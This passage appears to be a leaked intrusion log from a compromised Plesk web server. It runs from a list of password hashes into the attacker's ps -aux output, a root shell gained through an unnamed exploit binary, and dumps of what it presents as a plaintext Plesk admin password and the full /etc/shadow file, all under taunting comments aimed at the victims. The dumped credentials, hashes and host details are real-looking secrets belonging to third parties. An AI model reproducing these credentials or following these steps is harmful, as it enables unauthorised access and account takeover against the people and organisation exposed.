  935. tcsoal:$1$/Ciht4fS$S4Hx3kHnNkm3Vu2Cl/E7.1
  936. tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/
  937. tcsoms:$1$aCobysj2$oZShF1So8TZCuH8dq79UE0
  938. tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61
  939. tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61
  940. tisoms:$1$8mQ6hE6A$CvYlVP6fPLmuSHdyDJg4v1
  941. tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1
  942. tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1
  943. tunms:$1$6F5myr2t$KmJLCml.CybyQjDqoG3TG1
  944. tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1
  945. tunms:$1$uWPMvVMY$v3Qc7eyUJB7Evpt0iSnOq1
  946. tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1
  947. vbcsd:$1$C0j6Be38$To6eb4DzaCtA46pN/x6sG.
  948. vbcsd:$1$4e/iDO4I$6157lAdEF2IaaYKa2NwNS.
  949. wcsoks:$1$WO9U6YiB$wEEafCY2i86zRpEi1hce20
  950. wcsoks:$1$HZoMeTi0$gwdZvPQTqavG4sAiDlEXZ1
  951. wsoks:$1$eSaYt0Fv$vi9zN.GAwbKGQoslpxDr11
  952.  
  953. // LETS SEE WHAT KINDA SHIT THEY RUNNIN
  954.  
  955. $ ps -aux
  956. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  957. root 1 0.0 0.0 2156 532 ? Ss Feb22 3:04 init [3]
  958. root 2 0.0 0.0 0 0 ? S Feb22 0:35 [migration/0]
  959. root 3 0.0 0.0 0 0 ? SN Feb22 4:16 [ksoftirqd/0]
  960. root 4 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/0]
  961. root 5 0.0 0.0 0 0 ? S Feb22 0:30 [migration/1]
  962. root 6 0.0 0.0 0 0 ? SN Feb22 5:09 [ksoftirqd/1]
  963. root 7 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/1]
  964. root 8 0.0 0.0 0 0 ? S Feb22 0:38 [migration/2]
  965. root 9 0.0 0.0 0 0 ? SN Feb22 3:03 [ksoftirqd/2]
  966. root 10 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/2]
  967. root 11 0.0 0.0 0 0 ? S Feb22 0:53 [migration/3]
  968. root 12 0.1 0.0 0 0 ? SN Feb22 337:41 [ksoftirqd/3]
  969. root 13 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/3]
  970. root 14 0.0 0.0 0 0 ? S< Feb22 0:01 [events/0]
  971. root 15 0.0 0.0 0 0 ? S< Feb22 0:00 [events/1]
  972. root 16 0.0 0.0 0 0 ? S< Feb22 0:01 [events/2]
  973. root 17 0.0 0.0 0 0 ? S< Feb22 0:13 [events/3]
  974. root 18 0.0 0.0 0 0 ? S< Feb22 0:00 [khelper]
  975. root 19 0.0 0.0 0 0 ? S< Feb22 0:00 [kthread]
  976. root 25 0.0 0.0 0 0 ? S< Feb22 0:01 [kblockd/0]
  977. root 26 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/1]
  978. root 27 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/2]
  979. root 28 0.0 0.0 0 0 ? S< Feb22 0:27 [kblockd/3]
  980. root 29 0.0 0.0 0 0 ? S< Feb22 0:00 [kacpid]
  981. root 128 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/0]
  982. root 129 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/1]
  983. root 130 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/2]
  984. root 131 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/3]
  985. root 134 0.0 0.0 0 0 ? S< Feb22 0:00 [khubd]
  986. root 136 0.0 0.0 0 0 ? S< Feb22 0:00 [kseriod]
  987. root 213 0.0 0.0 0 0 ? S< Feb22 71:43 [kswapd0]
  988. root 214 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/0]
  989. root 215 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/1]
  990. root 216 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/2]
  991. root 217 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/3]
  992. root 372 0.0 0.0 0 0 ? S< Feb22 0:00 [kpsmoused]
  993. root 417 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/0]
  994. root 418 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/1]
  995. root 419 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/2]
  996. root 420 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/3]
  997. root 421 0.0 0.0 0 0 ? S< Feb22 0:00 [ata_aux]
  998. root 427 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_0]
  999. root 428 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_1]
  1000. root 444 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_2]
  1001. root 445 0.0 0.0 0 0 ? S Feb22 0:00 [hpt_wt]
  1002. root 446 0.0 0.0 0 0 ? S< Feb22 151:44 [kjournald]
  1003. root 471 0.0 0.0 0 0 ? S< Feb22 1:12 [kauditd]
  1004. root 504 0.0 0.0 2376 652 ? S< Feb22 0:00 [kmpathd/0]
  1005. root 1304 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/1]
  1006. root 1305 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/2]
  1007. root 1306 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/3]
  1008. root 1345 0.0 0.0 5072 1608 ? S Jul16 0:01
  1009. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1010. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1011. popuser 1346 0.0 0.0 7296 1144 ? S Jul16 0:03 /usr/bin/imapd
  1012. Maildir
  1013. root 1355 0.0 0.0 0 0 ? S< Feb22 0:00 [kjournald]
  1014. root 1387 0.0 0.0 5072 1848 ? S Jul16 0:01
  1015. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1016. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1017. popuser 1388 0.0 0.0 7372 1528 ? S Jul16 0:54 /usr/bin/imapd
  1018. Maildir
  1019. root 1401 0.0 0.0 5072 1608 ? S Jul16 0:01
  1020. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1021. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1022. popuser 1402 0.0 0.0 7296 1508 ? S Jul16 0:02 /usr/bin/imapd
  1023. Maildir
  1024. root 2218 0.0 0.0 13668 904 ? S< Feb22 0:00 [krfcommd]
  1025. root 2489 0.0 0.0 12948 1344 ? Ssl Feb22 2:16 pcscd
  1026. root 2503 0.0 0.0 1756 520 ? Ss Feb22 0:00 /usr/sbin/acpid
  1027. root 2527 0.0 0.0 2004 448 ? Ss Feb22 0:00 /usr/bin/hidd
  1028. --server
  1029. root 2552 0.0 0.0 30436 1320 ? Ssl Feb22 1:12 automount
  1030. root 2597 0.0 0.0 7212 872 ? Ss Feb22 2:01 /usr/sbin/sshd
  1031. root 2610 0.0 0.1 10256 2072 ? Ss Feb22 0:00 cupsd
  1032. root 2747 0.0 0.0 2000 464 ? Ss Feb22 0:00 gpm -m
  1033. /dev/input/mice -t exps2
  1034. postgres 2982 0.0 0.0 21240 1688 ? S Feb22 0:00
  1035. /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
  1036. postgres 2984 0.0 0.0 11016 420 ? S Feb22 0:06 postgres:
  1037. logger process
  1038. postgres 3001 0.0 0.0 21240 512 ? S Feb22 0:04 postgres:
  1039. writer process
  1040. postgres 3002 0.0 0.0 12020 292 ? S Feb22 0:00 postgres: stats
  1041. buffer process
  1042. postgres 3003 0.0 0.0 11204 336 ? S Feb22 0:00 postgres: stats
  1043. collector process
  1044. root 3046 0.0 7.0 248660 144752 ? Ss Feb22 108:36 /usr/sbin/httpd
  1045. xfs 3336 0.0 0.0 3584 1188 ? Ss Feb22 0:00 xfs -droppriv
  1046. -daemon
  1047. root 3363 0.0 0.0 2360 444 ? Ss Feb22 0:00 /usr/sbin/atd
  1048. avahi 3398 0.0 0.0 2684 1316 ? Ss Feb22 0:03 avahi-daemon:
  1049. running [ip-97-74-115-143.local]
  1050. avahi 3404 0.0 0.0 2684 424 ? Ss Feb22 0:00 avahi-daemon:
  1051. chroot helper
  1052. 68 3435 0.0 0.1 5776 3856 ? Ss Feb22 0:04 hald
  1053. root 3436 0.0 0.0 3256 1088 ? S Feb22 0:00 hald-runner
  1054. 68 3447 0.0 0.0 2104 828 ? S Feb22 0:00
  1055. hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
  1056. root 3475 0.0 0.0 33784 884 ? Sl Feb22 0:15 /usr/bin/hptsvr
  1057. root 3481 0.0 0.5 28360 11900 ? SN Feb22 0:08 /usr/bin/python
  1058. -tt /usr/sbin/yum-updatesd
  1059. root 3527 0.0 0.0 2656 1216 ? SN Feb22 0:26
  1060. /usr/libexec/gam_server
  1061. root 3855 0.0 0.0 3604 428 ? S Feb22 0:00
  1062. /usr/sbin/smartd -q never
  1063. root 3858 0.0 0.0 1744 464 tty1 Ss+ Feb22 0:00 /sbin/mingetty
  1064. tty1
  1065. root 3859 0.0 0.0 1748 468 tty2 Ss+ Feb22 0:00 /sbin/mingetty
  1066. tty2
  1067. root 3860 0.0 0.0 1744 464 tty3 Ss+ Feb22 0:00 /sbin/mingetty
  1068. tty3
  1069. root 3862 0.0 0.0 1744 460 tty4 Ss+ Feb22 0:00 /sbin/mingetty
  1070. tty4
  1071. root 3865 0.0 0.0 1744 464 tty5 Ss+ Feb22 0:00 /sbin/mingetty
  1072. tty5
  1073. root 3867 0.0 0.0 1748 468 tty6 Ss+ Feb22 0:00 /sbin/mingetty
  1074. tty6
  1075. root 3869 0.0 0.4 23908 8900 ? Ss Feb22 1:43
  1076. /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini
  1077. /usr/local/psa/admin/bin/modules/watchdog/wdcollect -c
  1078. /usr/local/psa/etc/modules/watchdog/wdcollect.inc.php
  1079. root 3870 0.0 0.1 37624 2848 ? Ssl Feb22 47:27
  1080. /usr/local/psa/admin/bin/modules/watchdog/monit -Ic
  1081. /usr/local/psa/etc/modules/watchdog/monitrc
  1082. root 5213 0.0 0.1 12360 3512 ? Ss Jul22 0:13 sshd:
  1083. root@notty
  1084. root 5217 0.0 0.0 6856 1748 ? Ss Jul22 0:00
  1085. /usr/libexec/openssh/sftp-server
  1086. root 5971 0.0 0.0 5068 1616 ? S Jul24 0:00
  1087. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1088. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1089. popuser 5974 0.0 0.0 7300 1248 ? S Jul24 0:00 /usr/bin/imapd
  1090. Maildir
  1091. root 6969 0.0 0.1 12132 3216 ? Ss Jul21 0:15 sshd:
  1092. root@notty
  1093. root 6978 0.0 0.0 6780 1604 ? Ss Jul21 0:00
  1094. /usr/libexec/openssh/sftp-server
  1095. root 6982 0.0 1.4 32744 30092 ? Ss Jul18 0:17 /usr/bin/spamd
  1096. --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail
  1097. --max-children 5 --create-prefs
  1098. --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin
  1099. --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock
  1100. root 7630 0.0 0.0 5380 1000 ? Ss Feb24 1:00 crond
  1101. root 7986 0.0 0.0 0 0 ? S Jul23 0:12 [pdflush]
  1102. 30 8301 0.0 0.0 3208 564 ? Ss Mar16 0:00
  1103. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
  1104. 30 8302 0.0 0.0 3208 564 ? Ss Mar16 0:00
  1105. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
  1106. apache 8354 0.1 6.8 249524 140568 ? S 03:04 0:02 /usr/sbin/httpd
  1107. drweb 9073 0.0 6.8 145876 140908 ? S 03:06 0:00 drwebd.real
  1108. drweb 9074 0.0 6.8 145876 140932 ? S 03:06 0:00 drwebd.real
  1109. drweb 9075 0.0 6.8 145876 141492 ? S 03:06 0:00 drwebd.real
  1110. drweb 9076 0.0 6.8 145876 141088 ? S 03:06 0:00 drwebd.real
  1111. popuser 9288 0.1 1.7 39044 36312 ? S 00:04 0:17 spamd child
  1112. 501 9741 0.0 0.2 9744 6176 ? S Jul20 0:27
  1113. /usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config
  1114. root 10034 0.0 0.0 5072 1616 ? S Jul24 0:00
  1115. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1116. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1117. popuser 10043 0.0 0.0 7296 1292 ? S Jul24 0:00 /usr/bin/imapd
  1118. Maildir
  1119. apache 10113 0.1 6.8 249356 140544 ? S 03:14 0:02 /usr/sbin/httpd
  1120. popuser 10206 0.1 1.7 39588 36860 ? S Jul24 0:49 spamd child
  1121. root 11201 0.0 0.0 4904 944 pts/2 S+ Jul20 0:00 screen
  1122. root 11202 0.0 0.0 5584 1668 ? Ss Jul20 0:03 SCREEN
  1123. root 11203 0.0 0.0 4764 1500 pts/1 Ss+ Jul20 0:00 /bin/bash
  1124. root 11229 0.0 0.0 4760 1524 pts/3 Ss+ Jul20 0:00 /bin/bash
  1125. root 11698 0.0 0.0 5072 1612 ? S Jul12 0:01
  1126. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1127. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1128. popuser 11701 0.0 0.0 7296 1500 ? S Jul12 0:42 /usr/bin/imapd
  1129. Maildir
  1130. root 11877 0.0 0.0 5072 1612 ? S Jul12 0:01
  1131. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1132. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1133. popuser 11878 0.0 0.0 7296 1172 ? S Jul12 0:13 /usr/bin/imapd
  1134. Maildir
  1135. root 12664 0.0 0.0 2832 780 ? Ss May17 1:33 xinetd
  1136. -stayalive -pidfile /var/run/xinetd.pid
  1137. drweb 12921 0.4 6.8 145876 142236 ? Ss May05 523:34 drwebd.real
  1138. apache 14656 0.1 6.8 249468 140792 ? S 03:21 0:02 /usr/sbin/httpd
  1139. apache 14807 0.0 6.8 249324 140492 ? S 03:22 0:01 /usr/sbin/httpd
  1140. apache 14927 0.1 7.2 258392 149936 ? S 03:22 0:01 /usr/sbin/httpd
  1141. apache 15025 0.1 6.8 249560 141268 ? S 03:23 0:02 /usr/sbin/httpd
  1142. popuser 15706 0.0 0.0 7404 1528 ? S 03:25 0:00 /usr/bin/imapd
  1143. Maildir
  1144. 30 15854 0.0 0.0 3208 660 ? Ss Mar22 0:00
  1145. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
  1146. 30 15856 0.0 0.0 3200 824 ? Ss Mar22 0:00
  1147. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
  1148. apache 16054 0.0 6.8 251588 140624 ? S 03:29 0:00 /usr/sbin/httpd
  1149. apache 16681 0.0 6.7 249208 140300 ? S 03:30 0:00 /usr/sbin/httpd
  1150. root 17623 0.0 0.0 5072 1616 ? S 00:29 0:00
  1151. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1152. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1153. popuser 17629 0.0 0.0 7296 1412 ? S 00:29 0:00 /usr/bin/imapd
  1154. Maildir
  1155. root 17716 0.0 0.0 0 0 ? S Jul24 0:14 [pdflush]
  1156. popuser 18091 0.0 0.0 7292 1136 ? S 01:38 0:00 /usr/bin/imapd
  1157. Maildir
  1158. root 18097 0.0 0.0 5068 1596 ? S 01:38 0:00 couriertls
  1159. -localfd=4 -tcpd -server
  1160. apache 18708 0.1 6.7 249328 139912 ? S 03:38 0:00 /usr/sbin/httpd
  1161. 30 19002 0.0 0.0 3200 564 ? Ss May05 0:00
  1162. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
  1163. root 19106 0.0 0.0 6072 732 ? S Jul08 0:09
  1164. /usr/lib/courier-imap/couriertcpd -address=0
  1165. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40
  1166. -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143
  1167. /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1168. root 19110 0.0 0.0 4904 1116 ? S Jul08 0:06
  1169. /usr/sbin/courierlogger imapd
  1170. root 19118 0.0 0.0 6068 732 ? S Jul08 0:14
  1171. /usr/lib/courier-imap/couriertcpd -address=0
  1172. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40
  1173. -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993
  1174. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1175. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1176. root 19120 0.0 0.0 4904 808 ? S Jul08 0:11
  1177. /usr/sbin/courierlogger imapd-ssl
  1178. root 19126 0.0 0.0 6072 748 ? S Jul08 0:32
  1179. /usr/lib/courier-imap/couriertcpd -address=0
  1180. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40
  1181. -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110
  1182. /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
  1183. root 19128 0.0 0.0 4900 1112 ? S Jul08 0:23
  1184. /usr/sbin/courierlogger pop3d
  1185. root 19135 0.0 0.0 6068 728 ? S Jul08 0:30
  1186. /usr/lib/courier-imap/couriertcpd -address=0
  1187. -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40
  1188. -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995
  1189. /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login
  1190. /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
  1191. root 19137 0.0 0.0 4904 996 ? S Jul08 0:23
  1192. /usr/sbin/courierlogger pop3d-ssl
  1193. apache 20073 0.0 6.7 248988 138776 ? S 03:43 0:00 /usr/sbin/httpd
  1194. root 20144 0.0 0.0 5068 1612 ? S 03:44 0:00
  1195. /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login
  1196. /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
  1197. popuser 20145 0.0 0.0 4936 860 ? S 03:44 0:00 /usr/bin/pop3d
  1198. Maildir
  1199. apache 20319 0.0 6.4 236508 132820 ? S Jul24 0:00 /usr/sbin/httpd
  1200. postfix 20848 0.0 0.1 8816 3452 ? S 03:46 0:00 smtpd -n smtp
  1201. -t inet -u -c -o smtpd_proxy_filter 127.0.0.1:10025
  1202. postfix 20849 0.0 0.0 7012 1732 ? S 03:46 0:00 proxymap -t
  1203. unix -u
  1204. postfix 20850 0.0 0.0 7024 1732 ? S 03:46 0:00 anvil -l -t
  1205. unix -u
  1206. postfix 20851 0.0 0.1 7172 2156 ? S 03:46 0:00 trivial-rewrite
  1207. -n rewrite -t unix -u
  1208. postfix 20852 0.0 0.0 7020 1720 ? S 03:46 0:00 spawn -n
  1209. 127.0.0.1:10025 -t inet user=mhandlers-user
  1210. argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
  1211. postfix 20854 0.0 0.0 7024 1728 ? S 03:46 0:00 spawn -n
  1212. 127.0.0.1:10027 -t inet user=mhandlers-user
  1213. argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
  1214. postfix 20856 0.0 0.1 8848 3292 ? S 03:46 0:00 smtpd -n
  1215. 127.0.0.1:10026 -t inet -u -c -o smtpd_client_restrictions -o
  1216. smtpd_helo_restrictions -o smtpd_sender_restrictions -o
  1217. smtpd_recipient_restrictions permit_mynetworks,reject -o smtpd_data_restrictions
  1218. -o receive_override_options no_unknown_recipient_checks
  1219. postfix 20857 0.0 0.1 7156 2272 ? S 03:46 0:00 cleanup -z -t
  1220. unix -u
  1221. postfix 20858 0.0 0.0 7068 1824 ? S 03:46 0:00 pipe -n
  1222. plesk_virtual -t unix flags=DORhu user=popuser popuser
  1223. argv=/usr/lib/plesk-9.0/postfix-local -f ${sender} -d ${recipient} -p
  1224. /var/qmail/mailnames
  1225. apache 20889 0.0 0.0 2272 824 ? R 03:47 0:00 ps -aux
  1226. root 21272 0.0 0.1 12936 4096 ? Ss Jul21 0:16 sshd:
  1227. root@notty
  1228. root 21278 0.0 0.0 6796 1748 ? Ss Jul21 0:00
  1229. /usr/libexec/openssh/sftp-server
  1230. root 21568 0.0 0.0 6968 1788 ? Ss Jul08 5:03
  1231. /usr/libexec/postfix/master
  1232. postfix 21765 0.0 0.1 8244 3064 ? S Jul08 3:16 qmgr -l -t fifo
  1233. -u
  1234. postfix 21910 0.0 0.0 7068 1932 ? S Jul08 0:09 tlsmgr -l -t
  1235. unix -u
  1236. apache 22145 0.1 7.0 256496 146220 ? S 01:56 0:08 /usr/sbin/httpd
  1237. 30 23051 0.0 0.0 3200 652 ? Ss Mar18 0:00
  1238. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue
  1239. 30 23052 0.0 0.0 3200 708 ? Ss Mar18 0:00
  1240. /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote
  1241. root 23196 0.0 0.0 4764 1500 pts/0 Ss+ Jul20 0:00 /bin/bash
  1242. named 24811 0.0 0.2 72156 5504 ? Ssl Jun29 11:38 /usr/sbin/named
  1243. -u named -c /etc/named.conf -u named -t /var/named/run-root
  1244. apache 25023 0.1 6.8 249408 140780 ? S 02:10 0:06 /usr/sbin/httpd
  1245. apache 25276 0.1 6.8 251928 141112 ? S 02:10 0:09 /usr/sbin/httpd
  1246. apache 26378 0.1 6.8 249368 140756 ? S 02:13 0:05 /usr/sbin/httpd
  1247. postfix 30087 0.0 0.0 7032 1780 ? S 02:20 0:00 pickup -l -t
  1248. fifo -u -c -o content_filter smtp:127.0.0.1:10027
  1249. root 30254 0.0 0.1 12140 3216 ? Ss Jul18 0:30 sshd:
  1250. root@pts/2
  1251. root 30395 0.0 0.0 4764 1512 pts/2 Ss Jul18 0:00 -bash
  1252. apache 30715 0.0 6.8 249436 140620 ? S 02:21 0:04 /usr/sbin/httpd
  1253. root 31126 0.0 0.0 4624 1216 pts/1 S Jul20 0:00 /bin/sh
  1254. /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock
  1255. --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
  1256. --user=mysql
  1257. mysql 31206 24.4 2.2 166880 45728 pts/1 Sl Jul20 1587:18
  1258. /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
  1259. --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking
  1260. --socket=/var/lib/mysql/mysql.sock
  1261. root 31988 0.0 0.0 5072 1604 ? S Jul16 0:01
  1262. /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin
  1263. /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
  1264. popuser 31992 0.0 0.0 7292 1420 ? S Jul16 0:03 /usr/bin/imapd
  1265. Maildir
  1266.  
  1267.  
  1268. // TIME TO GET STREET ON THESE PIGS
  1269.  
  1270. $ ./a.black.hat.never.kisses.and.tells
  1271.  
  1272. # id
  1273. uid=0(root) gid=0(root) groups=48(apache),2521(psaserv)
  1274.  
  1275. // CRACKING SHADOW FILES ARE LESS FUN WHEN PLESK STORES USER, FTP AND EMAIL
  1276. // PASSES IN PLAINTEXT IN FILES AND MYSQL PSA TABLES
  1277.  
  1278. # cat /etc/psa/.psa.shadow
  1279. 8w667nHzx%XFXb
  1280.  
  1281. # cat /etc/shadow
  1282. root:$1$9f.5eJ9.$QUYSU4l8mMYIIhg7Dvk5n0:15135:0:99999:7:::
  1283. bin:*:13913:0:99999:7:::
  1284. daemon:*:13913:0:99999:7:::
  1285. adm:*:13913:0:99999:7:::
  1286. lp:*:13913:0:99999:7:::
  1287. sync:*:13913:0:99999:7:::
  1288. shutdown:*:13913:0:99999:7:::
  1289. halt:*:13913:0:99999:7:::
  1290. mail:*:13913:0:99999:7:::
  1291. news:*:13913:0:99999:7:::
  1292. uucp:*:13913:0:99999:7:::
  1293. operator:*:13913:0:99999:7:::
  1294. games:*:13913:0:99999:7:::
  1295. gopher:*:13913:0:99999:7:::
  1296. ftp:*:13913:0:99999:7:::
  1297. nobody:*:13913:0:99999:7:::
  1298. rpm:!!:13913:0:99999:7:::
  1299. dbus:!!:13913:0:99999:7:::
  1300. mailnull:!!:13913:0:99999:7:::
  1301. smmsp:!!:13913:0:99999:7:::
  1302. nscd:!!:13913:0:99999:7:::
  1303. vcsa:!!:13913:0:99999:7:::
  1304. rpc:!!:13913:0:99999:7:::
  1305. rpcuser:!!:13913:0:99999:7:::
  1306. nfsnobody:!!:13913:0:99999:7:::
  1307. sshd:!!:13913:0:99999:7:::
  1308. pcap:!!:13913:0:99999:7:::
  1309. haldaemon:!!:13913:0:99999:7:::
  1310. webdept:$1$fMH2nTXH$8mR4nakYDl79MWehtHJpJ/:14599:0:99999:7:::
  1311. avahi:!!:14599::::::
  1312. avahi-autoipd:!!:14599::::::
  1313. named:!!:14599::::::
  1314. xfs:!!:14599::::::
  1315. apache:!!:14599::::::
  1316. distcache:!!:14599::::::
  1317. mysql:!!:14599::::::
  1318. ntp:!!:14599::::::
  1319. sw-cp-server:!!:14599:0:99999:7:::
  1320. psaadm:!!:14599:0:99999:7:::
  1321. popuser:!!:14599:0:99999:7:::
  1322. mhandlers-user:!!:14599:0:99999:7:::
  1323. webalizer:!!:14599::::::
  1324. psaftp:!!:14599:0:99999:7:::
  1325. alias:!!:14599:0:99999:7:::
  1326. qmaild:!!:14599:0:99999:7:::
  1327. qmaill:!!:14599:0:99999:7:::
  1328. qmailp:!!:14599:0:99999:7:::
  1329. qmailq:!!:14599:0:99999:7:::
  1330. qmailr:!!:14599:0:99999:7:::
  1331. qmails:!!:14599:0:99999:7:::
  1332. postgres:!!:14599::::::
  1333. drweb:!!:14599::::::
  1334. jdpa:!$1$JyO0yJgZ$HssFeCuxD2qNPBcqVAcrE0:14600:0:99999:7:::
  1335. barms:$1$JMHnROPk$hW1voLIUUozaP3fB/Q3PS/:14600:0:99999:7:::
  1336. bcsd:$1$9N.SKA8k$UB9Fa1pj4O9ScqvanwsuD0:14600:0:99999:7:::
  1337. bjm:$1$nQFDQuzG$nixGXRSZ2weKVIZbWvY2Y1:14600:0:99999:7:::
  1338. demo:$1$A/PXg4Bp$gxE6Tua9ymjgqIZiruTZJ/:14600:0:99999:7:::
  1339. dymin:$1$aV.nPRpD$w0u6q9utdB9fC0ze0Y9jk1:14600:0:99999:7:::
  1340. dcsd:$1$BmkM/hGw$WYVxaTBKlAnAG9oZfTNs40:14600:0:99999:7:::
  1341. bocg:$1$YCTsX/LA$muqhDQl9XfKRS691T9Ebu0:14600:0:99999:7:::
  1342. crcsd:$1$R2N6hV/D$Efk6P7K2EF6waHHkC.z9/.:14600:0:99999:7:::
  1343. bocs:$1$WTdEJKgC$cTG5MeoEUpdCmEODakZbF.:14600:0:99999:7:::
  1344. izhth:$1$kUKcvc.x$D20GJqyHyrmwvt9SUHSuo0:14600:0:99999:7:::
  1345. mcmtn:$1$neyLtM6z$VuI6CW0/bf5hdOUqgGkSn0:14600:0:99999:7:::
  1346. ccsal:$1$vhubLzwF$Evrqm.AX4vusW3SqmZA3B0:14600:0:99999:7:::
  1347. tunms:$1$annTeiUZ$twvp7SQzRRNJNEIvxS3Cx/:14600:0:99999:7:::
  1348. ccsd:$1$Lzz71cOH$Djo2V4u/SL9JKqrkvK0/41:14600:0:99999:7:::
  1349. ciwy:$1$DrcaNoRu$pj27lg4ogzIM/1T3xXCpF/:14600:0:99999:7:::
  1350. ncsd:$1$KRjV7G3q$sdkmFwpIp7p9FF1f4hhn90:14600:0:99999:7:::
  1351. icsd:$1$Jg/IPNZ3$173b6vFq9AlwznflpUbzp/:14600:0:99999:7:::
  1352. shsd:$1$4JEzAXVt$KG42rhcwE0livRJ00Awgb/:14600:0:99999:7:::
  1353. polms:$1$QEqTUIBr$L1VWAWaGnhYGsRu0FDrr6/:14600:0:99999:7:::
  1354. grcg:$1$yoyTc6DI$X8v6sg7ExdoUg0bNi8kmU/:14600:0:99999:7:::
  1355. lawmo:$1$0uQIYYqK$y0TIsAA9Miv4Vfn5o7KhR.:14600:0:99999:7:::
  1356. johms:$1$ljRMripB$/v33v9izoRJKITBK04ZgV.:14600:0:99999:7:::
  1357. sacsd:$1$6vTTH5h.$mu0.aSPxOJnNfw0Y1Yhy81:14600:0:99999:7:::
  1358. jcsd:$1$SR7NPa.y$bXGwoje29eCLh/jeptX7m.:14600:0:99999:7:::
  1359. gcsd:$1$ai7yamMR$JZPQccHWCGmMDeQFJ56eg0:14600:0:99999:7:::
  1360. izcg:$1$PpoAe8un$Tmmp4XEdNWUlJPSJv80Xj0:14600:0:99999:7:::
